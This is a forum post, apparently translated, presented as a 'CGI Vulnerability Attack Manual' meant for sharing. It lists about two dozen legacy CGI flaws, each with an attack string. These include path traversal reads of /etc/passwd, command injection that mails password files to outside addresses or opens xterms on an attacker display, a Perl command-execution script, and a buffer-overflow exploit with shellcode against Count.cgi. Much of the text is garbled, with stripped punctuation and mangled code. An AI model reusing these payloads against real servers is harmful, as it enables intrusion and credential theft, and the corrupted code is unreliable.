Preface

I saw bamboo's article on CGI vulnerability exploitation in the forum and wanted to expand it a bit. I kept meaning to polish it further before posting it, but I have not had the chance or the time to try every vulnerability, and since there are so many comrades in the forum who will come and improve it, I am calling it the CGI Vulnerability Attack Manual version-0.02 (an upgrade of bamboo's). It is meant to get the ball rolling; feel free to modify it or add to it, and even more so to spread it around.

1. The phf vulnerability
The phf vulnerability is probably the most classic one; almost every article covers it. It lets you execute commands on the server, for example displaying /etc/passwd:
lynx /cgi-bin/phf?Q.t%20/etc/passwd
But can we still find it anywhere?

2. php.cgi
The vulnerability in php.cgi 2.0beta10 and earlier lets you read any file the nobody account can read.
lynx /cgi-bin/php.cgi?/etc/passwd
php.cgi 2.1 can only read shtml files. As for the password file, comrades should keep in mind that it may also be in /etc/master.passwd, /etc/security/passwd and so on.

3. whois_raw.cgi
lynx /cgi-bin/whois.t%20/etc/passwd
lynx /cgi-bin/:0

4. faxsurvey
lynx /cgi-bin/faxsu.t%20/etc/passwd

5. textcounter.pl
If the server has textcounter.pl, anyone can execute commands with the privileges of the http daemon.
#!/usr/bin/perl
$URL=http:/dtp.kappa.ro/a/test.shtml;# please _DO_ _modify_ this
$EMAIL=pdorupop3.kappa.ro,root; # please _DO_ _modify_ this
if ($ARGV0) $CMD=$ARGV0;else$CMD=(ps ax;cd .;cd .;cd .;cd etc;cat hosts;set)|mail $EMAIL -sanothere_one;$text=$URL/;IFS=8;$CMD;echo|;$text = s/ /$IFS/g;#print $textn;
system(wget wget, $text, -O/dev/null);system(wget wget, $text, -O/dev/null);
#system(lynx lynx, $text); # if there is no wget command you can use lynx instead
#system(lynx lynx, $text);

6. A vulnerability in some versions (1.1) of info2www
$ REQUEST_METHOD=GET ./info2www (./././././././bin/mail jami /etc/passwd|)
$
You have new mail.
$
To be honest, I don't quite understand this one.

7. pfdispaly.cgi
lynx -source /cgi-bin/pfdispaly.cgi?/././././etc/motd
pfdisplay.cgi has another vulnerability that allows command execution:
lynx -dump /cgi-bin/pfdispaly.cgi?%0A/bin/uname%20-a|
or
lynx -dump http:/victim/cgi-bin/pfdispaly.cgi?%0A/usr/bin/X11/xclock%20-display%20evil:0.0|

8. wrap
lynx /cgi-bin/wrap?/./././././etc

9. www-sql
This lets you read some restricted pages. For example, if you type the following into your browser:
http:/your.server/protected/something.html
you are asked for an account and password. With www-sql you don't have to:
http:/your.server/cgi-bin/www-sql/.something.html

10. view-source
lynx /cgi-bin/view-././etc/passwd

11. campas
lynx /cgi-bin/campa.a/etc/passwd%0a

12. webgais
telnet 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the exploit line)

query=;mail+drazvanpop3.kappa.ro/etc/passwd;echo&output=subject&domain=paragraph

13. websendmail
telnet 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx=90)

receiver=;mail+your_/etc/passwd;&sender=a&rtnaddr=a&subject=a&content=a

14. handler
telnet 80
GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=Download HTTP/1.0
or
GET /cgi-bin/handler/blah;|?data=Download
or
GET /cgi-bin/handler/;xterm-displaydanish:0-e/bin/sh|?data=Download
Note that the character after cat is a TAB, not a space. The server will report that it cannot open useless_shit, but it still executes the command that follows.

15. test-cgi
lynx /cgi-bin/test-cgi?whatever
CGI/1.0 test script report:
argc is 0. argv is .
SERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME =
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html,text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = whatever
REMOTE_HOST =
REMOTE_ADDR = 00
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
This gives you some of the http directories.
lynx /cgi-bin/test-.t%20/etc/passwd
This trick does not seem to work.
lynx /cgi-bin/nph-test-cgi?/*
You can also try these:
GET /cgi-bin/test-cgi?* HTTP/1.0
GET /cgi-bin/test-cgi?x *
GET /cgi-bin/nph-test-cgi?* HTTP/1.0
GET /cgi-bin/nph-test-cgi?x *
GET /cgi-bin/test-cgi?x HTTP/1.0 *
GET /cgi-bin/nph-test-cgi?x HTTP/1.0 *

16. On some BSD Apache servers you can do:
lynx /root/etc/passwd
lynx /root/etc/passwd

17. htmlscript
lynx /cgi-bin/htmls././etc/passwd

18. jj.c
The demo cgi program jj.c calls /bin/mail without filtering user input, so any program based on jj.c could potentially be exploited by simply adding a followed by a Unix command. It may require a password, but two known passwords include HTTPdrocks and SDGROCKS. If you can retrieve a copy of the compiled program, running strings on it will probably reveal the password. Do a web search on jj.c to get a copy and study the code yourself if you have more questions.

19. Frontpage extensions
If you read /_vti_inf.html you get the version of the FP extensions and their path on the server. There are also some password files, such as:
/_vti_pvt/service.pwd
/_vti_pvt/users.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/administrators.pwd

20. F CGI
I have never come across this one, and I feel some parts must not be gotten wrong, so I am pasting the English directly.
John Carlton found the following. He developed an exploit for the free web stats services offered at , and supplied the webmaster with proper code to patch the bug.
Start an account , and log in. Click on the area that says CLICK HERE TO EDIT YOUR USER PROFILE & COUNTER INFO. This will call up a file called edit.pl with your user# and password included in it. Save this file to your hard disk and open it with notepad. The only form of security in this is a hidden attribute on the form element of your account number. Change this from
*input type=hidden name=account value=your#*
to
*input type=text name=account value=*
Save your page and load it into your browser. There will now be a text input box where the hidden element was before. Simply type a # in and push the click here to update user profile, and all the information that appears on your screen has now been written to that user profile. But that isn't the worst of it. By using frames (2 frames, one to hold this page you just made, and one as a target for the form submission) you could change the password on all of their accounts with a simple JavaScript function.
Deep inside the web site authors still have the good old edit.pl script. It takes some time to reach it (unlike the path described) but you can reach it directly at:
/cgi-bin/.=&password=

21. Vulnerability in Glimpse HTTP
telnet 80
GET /cgi-bin/aglimpse/80|IFS=5;CMD=5/etc/passwd;eval$CMD;echo HTTP/1.0

22. Count.cgi
This program only works against Count.cgi versions below 24:
/*#count.c#*/#include #include #include #include #include #include #include #include #include /* Forwards */unsigned long getsp(int);int usage(char *);void doit(char *,long, char *);/* Constants */char shell=x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90xebx3cx5ex31xc0x89xf1x8dx5ex18x88x46x2cx88x46x30x88x46x39x88x46x4bx8dx56x20x89x16x8dx56x2dx89x56x04x8dx56x31x89x56x08x8dx56x3ax89x56x0cx8dx56x10x89x46x10xb0x0bxcdx80x31xdbx89xd8x40xcdx80xe8xbfxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxff/usr/X11R6/bin/xterm0-ut0-display0;char endpad=xffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxff;int main (int argc, char *argv)char *shellcode = NULL;int 
cnt,ver,retcount, dispnum,dotquads4,offset;unsigned long sp;char dispname255;char *host;offset = sp = cnt = ver = 0;fprintf(stderr,t%s - Gusn,argv0);if (argc3) usage(argv0);while (cnt = getopt(argc,argv,h:d:v:) != EOF) switch(cnt)case h:host = optarg;break;case d:retcount = sscanf(optarg, %d.%d.%d.%d:%d, &dotquads0,&dotquads1,&dotquads2,&dotquads3, &dispnum);if (retcount != 5) usage(argv0);sprintf(dispname, %03d.%03d.%03d.%03d:%01d, dotquads0, dotquads1, dotquads2,dotquads3, dispnum);shellcode=malloc(strlen(char *)optarg)+strlen(shell)+strlen(endpad);sprintf(shellcode,%s%s%s,shell,dispname,endpad);break;case v:ver = atoi(optarg);break;case o:offset = atoi(optarg);break;default:usage(argv0);break;sp = offset + getsp(ver);(void)doit(host,sp,shellcode);exit(0);unsigned long getsp(int ver) /* Get the stack pointer we should be using. YMMV. If it does not work, try using -o X, where x is between -1500 and 1500 */unsigned long sp=0;if (ver = 15) sp = 0xbfffea50;if (ver = 20) sp = 0xbfffea50;if (ver = 22) sp = 0xbfffeab4;if (ver = 23) sp = 0xbfffee38; /* Dunno about this one */if (sp = 0) fprintf(stderr,I dont have an sp for that version try using the -o option.n);fprintf(stderr,Versions above 24 are patched for this bug.n);exit(1); else return sp;int usage (char *name) fprintf(stderr,tUsage:%s -h host -d -v -o n,name);fprintf(stderr,te.g. 
%s -h www.foo.bar -d :0 -v 22n,name);exit(1);int openhost (char *host, int port) int sock; struct hostent *he;struct sockaddr_in sa;he = gethostbyname(host);if (he = NULL) perror(Bad hostnamen);exit(-1);memcpy(&sa.sin_addr, he-h_addr, he-h_length);sa.sin_port=htons(port);sa.sin_family=AF_INET;sock=socket(AF_INET,SOCK_STREAM,0);if (sock 0) perror (cannot open socket);exit(-1);bzero(&sa.sin_zero,sizeof (sa.sin_zero);if (connect(sock,(struct sockaddr *)&sa,sizeof sa)0) perror(cannot connect to host);exit(-1);return(sock);void doit (char *host,long sp, char *shellcode) int cnt,sock;char qs7000;int bufsize = 16;char bufbufsize;char chain = user=a;bzero(buf);for(cnt=0;cnt 8;qscnt+2 = (sp & 0x00ff0000) 16;qscnt+3 = (sp & 0xff000000) 24;strcpy(qs,chain);qsstrlen(chain)=0x90;qs4104= sp&0x000000ff;qs4105=(sp&0x0000ff00)8;qs4106=(sp&0x00ff0000)16;qs4107=(sp&0xff000000)24;qs4108= sp&0x000000ff;qs4109=(sp&0x0000ff00)8;qs4110=(sp&0x00ff0000)16;qs4111=(sp&0xff000000)24;qs4112= sp&0x000000ff;qs4113=(sp&0x0000ff00)8;qs4114=(sp&0x00ff0000)16;qs4115=(sp&0xff000000)24;qs4116= sp&0x000000ff;qs4117=(sp&0x0000ff00)8;qs4118=(sp&0x00ff0000)16;qs4119=(sp&0xff000000)24;qs4120= sp&0x000000ff;qs4121=(sp&0x0000ff00)8;qs4122=(sp&0x00ff0000)16;qs4123=(sp&0xff000000)24;qs4124= sp&0x000000ff;qs4125=(sp&0x0000ff00)8;qs4126=(sp&0x00ff0000)16;qs4127=(sp&0xff000000)24;qs4128= sp&0x000000ff;qs4129=(sp&0x0000ff00)8;qs4130=(sp&0x00ff0000)16;qs4131=(sp&0xff000000)24;strcpy(char*)&qs4132,shellcode);sock = openhost(host,80);write(sock,GET /cgi-bin/Count.cgi?,23);write(sock,qs,strlen(qs);write(sock, HTTP/1.0n,10);write(sock,User-Agent: ,12);write(sock,qs,strlen(qs);write(sock,nn,2);sleep(1); /* printf(GET /cgi-bin/Count.cgi?%s HTTP/1.0nUser-Agent: %snn,qs,qs); */*setenv(HTTP_USER_AGENT,qs,1); setenv(QUERY_STRING,qs,1);system(./Count.cgi);*/
Using Count.cgi to view images:
/cgi-bin/Co.to_gif/file.gif

23. finger.cgi
lynx /cgi-bin/finger?localhost
This gets you the names of the users logged in on the host.

24. man.sh
Robert Moniot found the following. The May 1998 issue of SysAdmin Magazine contains an article, Web-Enabled Man Pages, which includes source code for a very nice cgi script named man.sh to feed man pages to a web browser. The hypertext links to other man pages are an especially attractive feature. Unfortunately, this script is vulnerable to attack. Essentially, anyone who can execute the cgi thru their web browser can run any system commands with the user id of the web server and obtain the output from them in a web page.

25. FormHandler.cgi
Add  to the form and /etc/passwd shows up in your mailbox.

26. JFS
I believe everyone has read the article "The detailed process of JFS breaking into the PCWEEK-LINUX host"; he used the photoads CGI module to get into the host. I have not actually carried out this attack myself; my understanding from the article is as follows. First:
lynx /photoads/cgi-bin/edit.cgi?AdNum=31337&action=done&Country=lala&City=lele&State=a&EMail=&Name=%0a1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111&Phone=11&Subject=la&password=0&CityStPhone=0&Renewed=0
Create